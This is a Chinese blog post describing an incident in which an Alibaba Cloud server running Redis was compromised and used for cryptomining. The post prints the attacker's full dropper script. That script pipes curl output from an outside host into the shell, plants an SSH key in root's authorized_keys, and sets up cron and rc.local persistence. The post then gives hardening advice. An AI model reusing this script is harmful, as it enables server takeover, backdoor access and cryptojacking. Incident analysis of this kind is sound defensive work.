黑客入侵阿里云主机挖矿以及利用redis漏洞扫描抓取肉鸡

最新推荐文章于 2024-08-18 21:23:41 发布
最新推荐文章于 2024-08-18 21:23:41 发布
阅读量1w 收藏 8
点赞数 2
分类专栏: 安全 文章标签: 安全 黑客 阿里云 挖矿 redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010064124/article/details/79593060
版权

        本人前几天购买了阿里云主机,并安装了redis,第二天早上阿里云客服打电话过来询问我在ECS上做什么,为毛CPU的使用率一直都是满的,我说我才买的啊,就装了俩软件,现在还在装呢,客服说我可能是装软件导致的这个问题,让我注意一下,如果长期CPU满负荷,可能给我宕机,资源数据不保。

        挂了电话后我就登上了阿里云账号,看了一下自己Mem和CPU的使用状况,Mem倒没撒,CPU确实一直是一条直线,一直是百分之百。后来我就看了ps -aux看了进程cpu和内存占用情况,发现了以下:

第一条红线,cpu使用率竟然达到了98%,切换到了这个目录下,发现了还有一个可执行文件叫做gpg-agent,我百度了以下这个玩意,貌似用来加密进行远程登录的,但是进程里的这玩意多了个d,我顿时敏锐的感觉到了这可能是一个病毒,一直占着我的CPU,我把它禁掉了之后,CPU使用开始直线式下落直到水平。

        然而,过了好几分钟后,我又一次ps -aux,竟然又看到了它,我在想怎么干不掉啊,然后看到了进程里面老是出现http://img.namunil.com/什么的,我看一下这个ip:

 

        这个ip竟然是特喵的葡萄牙的。。。。也就是说我的机子可能被植入了恶意脚本,下载了那么个玩意儿,我把这个进程杀死了,把这个二进制的可执行文件给删除了,它还是会继续下载,继续执行。

        想想为什么会这样,原来linux里有一个自动执行的软件crontab,在/etc/下面,里面有一行curl -fsSL http://img.namunil.com/ash.h | bash,也就是说自动执行这句话,从这个url下载东西然后当成shell执行,我尝试着curl了这个东西,发现代码如下:

PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin
HISTSIZE=1
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron 2>/dev/null
crontab -l 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/25 * * * * curl -fsSL http://img.namunil.com/ash.php | sh' > /var/spool/cron/root
echo '*/30 * * * * curl -fsSL http://img.namunil.com/ash.php | sh' > /var/spool/cron/crontabs/root
echo 'curl -fsSL http://img.namunil.com/ash.php | sh' > /etc/rc.local
echo 'exit 0' >> /etc/rc.local
yum install -y bash 2>/dev/null
apt install -y bash apt-get 2>/dev/null
apt-get install -y bash 2>/dev/null

bash -c 'curl -fsSL http://img.namunil.com/bsh.php | bash' 2>/dev/null

        终于真相露出了水面,这段代码显示关闭了我的selinux,然后又在我的本地添加了对方的公钥,试图想免密远程登录我的ECS,用心良苦啊。。。然后又继续下载了bsh.php脚本,然后下载那个agentd恶意二进制可执行文件,那个可执行文件就是用来挖矿的,也就是图一耗费了百分之98的CPU。

        当控制了我的ECS挖矿后,然后又用masscan 扫描远程主机的6379-6381的端口,这些远程主机的ip段为79.191.0.0/16等等(如图一第二条红线),利用了redis的6379端口没有授权,进而扫描然后再把自己的公钥写入,也就是寻找肉鸡。

        然而一开始它是怎么登上我的主机上传脚本的呢。回想了一下,因为我买主机的时候设置了一个小白密码(我的名字首字母加生日),估计是被别人 暴力破解了。

        解决方案:更改ssh登录端口,更改redis端口,将ssh登录密码设置成高级的(字母大小写数字标点,尽量长一下),就此解决问题。

 

楚西歇雨子
关注
专栏目录
阿里云Redis之:配置程序接入阿里云Redis集群缓存数据(十七)
江晓龙的博客
11-29 2426
找到白名单设置—>添加白名单分组—>设置分组名称为ecs_cluster—>添加方式为加载ECS私网IP—>找到要添加的ecs添加到白名单中即可。2)点击服务器管理—>服务器管理—>系统缓存类型选择Redis—>填写Redis集群的信息—>点击检测—>最后点击保存即可。1)点击实例信息—>在连接信息中点击设置免密访问—>在弹出的框中勾选缺点即可。账号为kodcloud—>权限为读写—>密码为kodcloud@123。点击上传安装—>上传文件—>观察Redis集群中是否有Key产生。
使用redis-shake工具迁移云Redis数据(二十一)
热门推荐
江晓龙的博客
12-08 1万+
阿里云Redis版本时5.x,由于版本兼容性问题,我们也需要在ECS中部署5.x版本的Redis。 2.安装redis-shake工具 3.redis-shake配置文件 redis-shake其他扩展参数: 源redis的类型,支持一下4种类型:: 单db节点/主从版模式。如果源端是从多个db节点拉取就选择这个模式,即便是codis等开源的proxy-db架构。: sentinel模式。: 集群模式。开源的cluster。对于阿里云来说,用户目前无法拉取db的地址,所以此处只能是proxy。: pro
国内国外活跃IP扫描器 扫鸡必备工具!
01-16
国内国外活跃IP扫描器 扫鸡必备工具 打开生成功的IP全在IP.TXT文件里面!
我遇到的肉鸡黑客)攻击
浪迹天涯
12-27 1464
1、commons-collections-3.2.2 更低版本有反序列化远程命令执行漏洞。 链接如下: https://www.iswin.org/2015/11/13/Apache-CommonsCollections-Deserialized-Vulnerability/   http://sec.edu-info.edu.cn/182   原因分析:1)没有定时对使用的第三...
十大知名权威安全漏洞库介绍
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
08-18 1319
CVE(Common Vulnerabilities and Exposures)是公开披露的网络安全漏洞列表。IT人员、安全研究人员查阅CVE获取漏洞的详细信息,进而根据漏洞评分确定漏洞解决的优先级。在CVE中,CVE编号是识别漏洞的唯一标识符。
黑客操纵“肉鸡” 攻击网游服务器
weixin_34408624的博客
07-03 2170
黑客”家中自学计算机网络课程后,远程连接异地服务器网上抓取大量“肉鸡”,出租给买家,而买家利用这些“肉鸡”,发动DDOS攻击网游公司服务器,致使大批玩家网友无法登录。记者从北京海淀警方获悉,民警千里追击,将躲藏在江苏、河南的“黑客”和攻击者抓获,目前,涉案人耿某、李某因涉嫌非法破坏计算机信息系统现已被批捕。 今年1月初,海淀一家大型网游公司向海淀网安大...
redis关键字删除_挖矿肉鸡排查修复:裸奔的Redis
weixin_35740545的博客
12-23 114
挖矿肉鸡排查修复 昨晚,在可视化平台上,查看服务器监控情况,发现服务器CPU100%运行一天多了。因为是自己的测试服务器,拿来玩的,没有运行什么项目,所以,也没有经常看。发现100%,这是个问题啊,看来有人在搞事情啊,自己有事儿要做了!裸奔图01.GIF排查步骤:一、 top 命令查看服务器运行情况裸奔图02.GIF上图显示:qW3xT.2 进程CPU运行始终保持在98%以上,这个就是问题所在...
肉鸡类问题排查思路
weixin_34149796的博客
08-13 199
肉鸡检查和防护,提供一些思路与方法,供参考:账户方面:Windows:(1)检查服务器内是否有异常的账户,查看下服务器内是否有非系统和用户本身创建的账户,一般***创建的账 户账户名后有$这个字符,有此类账户存在,请立即禁用或者删除掉;(2)***也可能在您服务器内创建隐藏用户,隐藏账户在本地用户内是查看不到的,您可以在服务器内 点击开始-运行-输入...
阿里云服务器养只大虫子:Redis漏洞挖矿造成CPU100%的解决办法
Sail__的专栏
01-17 3838
之前在9月份的时候,我的阿里云服务器出现过一次被挖矿的情况,也是cpu爆满,后来发现是因为mysql的漏洞。 当时抓着mysql一顿处理,新建用户,强密码,设权限,nologin,可算是正常了。 这几天又再次出现了被挖矿的情况,今天算是解决了,舒服,下面说下情况。 表现:服务器上的web应用一场的慢,ssh登陆进去top -c查看如下: COMMAN处的[UWcUml]占用cpu100...
阿里云Redis之:通过阿里云自带的连接工具连接Redis(十八)
江晓龙的博客
12-02 6929
数据库类型选择Redis—>实例地区选择华北2—>实例ID选择我们要连接的Redis—>访问模式选择免密登录—>点击测试连接—>测试连接成功后弹出成功。在左侧可以点击搜索查看到所有的key,在SQL Console中可以执行redis的相关命令,点击执行就可以查询结果。可以在执行结果的单行详情中看到详细的结果。进入实例列表—>点击登陆数据库。点击登陆按钮登陆Redis数据库。
阿里云服务器安装Redis以及使用RedisDesktopManager远程连接
weixin_43585512的博客
11-02 2859
阿里云服务器安装Redis以及使用RedisDesktopManager远程连接 注意事项 想要远程连接需要 一 、修改redis.conf配置文件 1.daemonize yes 2.bind 127.0.0.1 3.protected-mode no 4.requirepass password(可选择)修改密码 二、开放服务器端口 三、安装过程 1.用xshell连接服务器并新建文件夹 /...
记一次阿里云肉鸡排查
小纯洁的博客
05-23 728
今天上午大概10点多,登录服务器查看相关项目,不料登录页面直接卡死,无法连接,好不容易登录进去发现,命令输入卡的不要不要的,一看CPU 卧槽!卧槽!卧槽! 我都没跑什么程序怎么100%???(个人的非公司的,没有跑什么程序) 赶紧登录阿里云控制台发现, 卧槽?吓得我赶紧点进去看看这tm的日了狗了!!!!!!赶紧进入阿里云网页版控制台,也是漫长的煎熬,等了半天终于进去了 然而并没有什么卵用...
还不重视?黑客可以通过Redis控制你的服务器
qq_43665434的博客
03-31 305
Redis未授权访问漏洞简单复现 前记: 我见青山多妩媚,料青山见我应如是。一杯茶一包烟,一个环境搭一天。 环境准备: 角色 主机 IP 受害服务器 centos8(安装有redis6) 192.168.1.129 攻击者 kali 192.168.1.115 首先在centos8上搭建redis服务,详情请参考文章,个人在搭建的时候遇到很多坑,希望大家按步骤认真搭建。 安装完redis6后,要配置远程连接,请参考文章。 kali中需要安装redis客户端redis-cli,请自
管中窥豹---分析一个只抓中国肉鸡的DDOS团伙
weixin_33725722的博客
03-08 610
virustracker · 2015/06/17 10:19source:https://blog.malwarebytes.org/intelligence/2015/06/unusual-exploit-kit-targets-chinese-users-part-2/最近,我们的研究人员发现了一个非常奇怪的exploit kit正在攻击中国的域名。在上一篇文章中,我们详细地讨论了这个exp...
记录一次阿里云服务器被黑挖矿的事件(top不显示占用CPU进程)
qq_36588424的博客
12-29 4734
大家好,今天一大早起来一看3台阿里云服务器被吓了一跳,CPU占用高达100%,运行的hadoop服务被卡死,当时完全是懵逼的状态,结果在网上找了下料,定位到原因为被黑客攻击了,用来当矿机了,当时我懵了,我这垃圾配置,也拿来挖矿,这不是浪费时间么,不过说归说,毕竟还是很影响我使用的,下面是我处理3台服务器的一些步骤。 第一台服务器: 首先我们top一下,看top命令有没有被篡改,如果没有的话,就能一下子定位到是哪个进程占用CPU,如下图所示: 从这张图可以看到,PID为25415的进程占用了大量的CPU。
阿里云安全记录--基线检查、漏洞扫描,&CIS安全基线文档
weixin_30800807的博客
09-19 2156
阿里云安全基线 记录如下 不定时更新 0x0 0x1 --Centos7 基线检查190621 0x2 --Centos6 基线检查190627 0x3 --Ubuntu安全基线检查190621 0x3.5 --SSH登录安全策略、账户-密码 0x4 --Windows基线检查(按照CIS-Linux Windows 2008 R2最新基线标准进行系统层面基线检测) ...
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4720
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
2核4G阿里云服务器被黑客抓鸡??然鹅一个操作就搞定
草木如织,匪我思且
07-22 1048
云服务器配置:2核4G的centos7,已经算是比较好的配置了,被别有用心的人盯上看来是情有可原。。。 这是自我用阿里云服务器来的第一次被黑客攻击,那天我正走在路上,哼着一些流行的小调,都是我在街上听到的,主要是手机店放的歌,遇到熟悉好听的歌但想不出歌名时候我都掏出手机,打开vivo的i音乐听歌识曲功能,将手机靠近音响,就能识别出歌来了,然后就点赞、喜欢、收藏三连,以供以后慢慢食用。 然而就是在7月22号晚上7点多的时候,通知声从手机传...
redis连接不上,查看进程gpg-agentd刷爆CPU,恭喜你,你被挖矿
mengruobaobao的博客
03-19 2231
最近发现有一台测试服务器的redis连接不上,查看进程,发现CPU200%之前遇到过类似的,第一感觉就是被入侵了。IO 情况、网络流量、内存情况、系统日志、啥也不看了,直接看crontab 定时任务crontab -l 一下看定时任务列表把定时任务删掉 crontab -r杀掉所有进程 kill -9 25286 处理结束1.漏洞描述Redis 因配置不当存在未授权访问漏洞,可以被攻击者恶意利用...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值